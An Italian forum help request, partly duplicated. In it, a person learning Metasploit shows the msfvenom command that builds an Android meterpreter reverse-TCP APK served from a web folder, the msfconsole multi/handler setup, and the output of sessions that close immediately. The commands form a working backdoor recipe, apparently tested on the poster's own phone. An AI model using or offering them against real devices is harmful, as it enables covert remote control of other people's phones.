Ultima modifica da un moderatore:
ciao a tutti,
questi giorni sto cercando di imparare meglio metasploit, ho provato a creare una reverse shell per android con msfvenom:
e mi da il seguente risultato:
successivamente metto in ascolto la macchina attaccante su msfconsole:
ed ora arriva il problema, quando avvio la backdoor dal mio dispositivo android mi da il seguente risultato:
e continua a rimanere in ascolto. Se clicco nuovamente sull'applicazione malevola (da telefono) continua a dare il resultato precedente ma con il numero di sessione diverso (1,2,3,4 ecc..).
Qualcuno che può aiutarmi?
questi giorni sto cercando di imparare meglio metasploit, ho provato a creare una reverse shell per android con msfvenom:
Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.xx LPORT=8080 R > /var/www/html/file.apk
e mi da il seguente risultato:
Ruby:
[-] No platform was selected, choosing Msf::Module:latform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10191 bytes
successivamente metto in ascolto la macchina attaccante su msfconsole:
Ruby:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOADS android/meterpreter/reverse_tcp
PAYLOADS => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.xx:8080
ed ora arriva il problema, quando avvio la backdoor dal mio dispositivo android mi da il seguente risultato:
Ruby:
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.1.yy - Command shell session 1 closed.
e continua a rimanere in ascolto. Se clicco nuovamente sull'applicazione malevola (da telefono) continua a dare il resultato precedente ma con il numero di sessione diverso (1,2,3,4 ecc..).
Qualcuno che può aiutarmi?